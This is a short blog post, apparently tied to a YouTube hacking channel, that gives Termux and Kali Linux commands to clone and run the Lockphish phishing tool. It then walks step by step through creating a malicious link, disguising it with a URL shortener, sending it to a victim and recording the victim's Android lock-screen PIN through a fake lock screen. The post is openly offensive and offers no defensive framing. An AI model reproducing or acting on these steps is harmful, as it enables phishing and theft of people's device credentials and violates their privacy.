How to install lockphish GitHub
For more hacking and technology related videos subscribe the m2d Tech channel
👉Click here to visit the channel👈
Method 1
Steps for termux (lockphish)
●Pkg update
●Pkg upgrade
●Pkg install git
●Pkg install php
●Git clone https://github.com/thelinuxchoice/lockphish
●Ls
●CD lockPhish
●Ls
●Chmod +x *
●Bash lockphish.sh
Steps for kali linux
●Apt update
●Apt install git
●Apt install php
●Git clone https://github.com/thelinuxchoice/lockphish
●Ls
●CD lockPhish
●Ls
●Chmod +x *
●Bash lockphish.sh
How it's working?
Hacking android passwords lock screen passwords is one of the easiest things to do. There are many social engineering and technical methods that help you bypass android security. Well, today we will show you one more easy and unexpected method to hack and steal an android lock screen password with Lockphish. So let’s begin:
Method 2
Step 1: Clone Lockphish on your kali Linux with the following command:
git clone https://github.com/JasonJerry/lockphish
Step 2: Now change the directory to the lockphish folder as shown:
cd lockphish
Step 3: Now run lockphish with the following command:
bash lockphish.sh
Step 4: Press enter to use the default youtube link or Provide the link you want the victim to be redirected to as shown below:
Step 5: Press enter and the malicious link will be automatically created as shown below:
Step 6: Send this link to the victim. You can use a URL shortening tool as well to make the URL appear normal.
Step 7: The victim will see a lock screen as shown below:
Step 8: When the target enters the password it will be recorded as shown below:
How the hack works:
In this hack when we create the malicious link, that when forwarded to the victim calls a page that looks just like the android login screen. When the victim unlocks the screen we can easily get access to the victim’s password as shown above. The victim thinks that their phone was locked when in reality it was a hack. And after entering his password on the fake page, the victim’s password will be sent to us just as shown above and you now have access to the victim’s pin password.
Comments
Post a Comment